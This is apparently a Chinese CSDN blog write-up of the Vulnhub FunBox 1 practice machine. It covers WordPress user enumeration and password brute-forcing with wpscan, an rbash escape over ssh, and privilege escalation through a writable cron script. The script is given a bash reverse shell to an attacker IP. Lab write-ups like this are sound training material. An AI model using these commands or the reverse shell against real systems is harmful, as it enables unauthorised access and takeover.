FUNBOX_1靶场详解

最新推荐文章于 2024-05-26 21:56:19 发布
最新推荐文章于 2024-05-26 21:56:19 发布
阅读量977 收藏 1
点赞数
分类专栏: 打靶机系列 文章标签: 服务器 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131925939
版权

FUNBOX_1靶场复盘

这个系列的靶场给出的干扰因素都挺多的,必须从中找到有用的线索才可以。

这个靶场你扫描到ip地址后打开网页会发现,ip自动转换成域名了,所以我们需要添加一条hosts解析才可以。

192.168.102.190		funbox.fritz.box

从目录扫描中可以看出这是一个wordpress的网站。

image-20230722192826991

利用wpscan工具可以枚举wordpress的用户名。

wpscan --url http://funbox.fritz.box --enumerate u

image-20230722192649911

然后对用户名进行爆破一下,发现两个的密码都出来了。

wpscan --url http://funbox.fritz.box -U users -P /usr/share/wordlists/rockyou.txt

image-20230722193139343

这里是利用joe用户进行了ssh登陆,当然也可以登陆wordpress后台,但是没什么可用的东西。

登陆后发现这是一个rbash,就是这是一个只读bash。

image-20230722193344392

利用ssh的-t参数我们可以跳过这个限制。

image-20230722193310432

ssh上来后,ls一下发现有个mbox文件,发现类似两个邮件,并且是隔了几分钟的,所以就怀疑后台在运行着一个计时任务。

就wget下来一个pspy64,这个文件可以实时监控进程。

image-20230722195846010

发现的确有一个计时任务,有两个用户都在运行,一个是UID为1000的,一个是root用户,只要我们能往这里面写的内容就可以拿到一个root的反弹shell。

image-20230722205742857

发现这个文件我们是可修改的,在里面添加了一条反弹shell文件,就等拿到UID为1000的权限或者,root权限,如过没拿到ROOT权限就重新监听一下。

image-20230722203252750

过了一会儿就拿到root权限了,这里应该是普通用户执行两次后root用户才会执行一次,所以要监控好root用户什么时候执行。

bash -i >/dev/tcp/192.168.102.129/8888 0>&1

image-20230722205601365

dumplings。
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub的wp之funbox1
weixin_62246577的博客
10-13 210
vulnhub靶机系列之funbox1
FunBox11靶场 安装下载渗透详细教程
qq_41245301的博客
12-22 1196
3.通过扫描发现开启了ftp服务并且ftp的版本很低我们可用尝试通过这个服务进攻击。靶机通常在root目录下有个root.txt的文件看到它表示这个靶机已经拿下。我们发现这个版本的ftp是有漏洞的而且在msf中有对应的漏洞利用模块。-A : 启动Os检测,版本检测,脚本扫描和traceroute。通常情况我们是通过服务的名称加版本配合search进行搜索。1.提供arp-scan工具扫描网络主机IP。2.通过nmap 对目标主机进行扫描。选择一个合适的payload进行设置。查看可用的payload列表。
vulnhub靶场FunBox-8
最新发布
qq_58091216的博客
05-26 926
我们查看根目录有/home,我们进行查看,可以看到4个用户名,我们再次进行ftp爆破。因为4个用户名,只有john没有爆破出来密码,所以我们进行ssh爆破。我们可以看到是一幅画,查看源代码发现,需要域名绑定。爆破出来用户名是johh,密码是zhnmju!我们首先把用户名放到一个文件里面,然后进行爆破。我们换一个思路进行渗透,我们想到前面的源代码。我们发现了密码,我们进行下载,我们进行爆破。我们想到开启了21端口,我们进行查看。我们可以看到2个文件,我们进行查看。我们查看jules用户名。
vulnhub靶场FunBox-1
qq_58091216的博客
05-01 442
但是我们发现不能使用,那么我们就换一个思路,进行解决,我们知道22端口是开启的,我们使用ssh进行登录。虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.2.0/24。我们可以想到是IP地址和域名没有进行绑定,我们进行绑定即可。首先我们使用joe进行登录,但是没有发现有用的信息。我们可以发现一个404.php,我们进行利用即可。我们查看id,发现不是root权限,我们进行提权。爆破出来2个用户名和密码,我们进行登录查看。我们可以看到/home目录,我们进行查看。
Vulnhub靶机:FunBox 1
qq_48904485的博客
01-21 1059
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FunBox 1(10.0.2.26)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2296
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
FunBox.zip_melody
09-24
1. **音符生成**:通过设置定时器中断来生成特定频率的声音,频率决定了音高。这可能涉及到对处理器的定时器寄存器的操作,例如调整预装载值以改变中断频率。 2. **节拍控制**:保持旋律的节奏需要精确控制每个音符...
funbox:测试和工具程序
02-11
1. **C语言基础**:C语言是一种广泛使用的编程语言,以其高效、简洁和灵活性著称。它是许多操作系统(如Linux)和系统级软件的基础。在"funbox"项目中,C语言被用来编写各种工具和测试程序,这表明项目关注的是底层...
i-FunBox 中文版 v1.96.938.649
04-27
软件介绍 iFunBox是一款小巧的iPhone, iPad 和 iPod Touch文件管理软件。无须越狱和任何破解,可以直接使用,不安装任何守护进程。 界面类似于windows资源管理器,以简练时尚的窗口方式浏览和管理iPhone、iPad、iPod...
page+widget.rar
09-02
page+widget.rar
vulnhub靶场FunBox-2
qq_58091216的博客
05-02 491
新建一个 MS02423文件夹把下载的压缩包文件都放进去发现里面都是加密的 id_rsa再把 /usr/share/wordlists/rockyou.txt字典 复制进去。我们可以看到报错了,那么这个办法是行不通的,我们换一个思路,我们查看ftp访问。我们可以看到成功绕过,我们查看home目录下的文件。我们看到好多的压缩包而且都是加密的,我们进行爆破。我们可以看到权限是root,我们直接查看flag。我们通过密码获取到tom的私钥,我们进行登录。我们知道tom的密码了,那么我们直接进行登录。
Funbox10靶场--详细教程
qq_41245301的博客
01-25 1300
更新下载资源包下载gobustercompletion: 为指定shell生成自动完成脚本dir:文件路径/目录枚举dns:dns子域名枚举s3:枚举打开储存桶并查找存在和存储桶清单(适用aws)命令说明completion为指定shell生成自动完成脚本dir文件路径/目录枚举dnsdns子域名枚举fuzz使用模糊测试模式。替换URL、Headers和请求体中的关键词FUZZgcs使用gcs bucket枚举模式help获取任何命令的帮助信息s3。
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 482
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
【每日打靶练习】vulnhub靶机平台--Funbox2(低)
leo788的博客
01-05 806
本靶机可熟悉ssh公钥登录,利用john工具进行密码破解,rbash逃逸并利用mysql服务提权。
FUNBOX: SCRIPTKIDDIE 靶场
小小猪的博客
09-09 519
获得python交互shell,查看文件。爆破目录,发现wp-admin目录。查看文件,发现proftpd利用方式。配置完成,执行,获得shell。nmap扫描靶机端口以及服务。配置完成,还需要导入监听模块。查看到21端口开放的服务。导入模块,查看相关配置。访问之后发现无法利用。
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5449
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
FUNBOX: UNDER CONSTRUCTION!
08-16
- *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值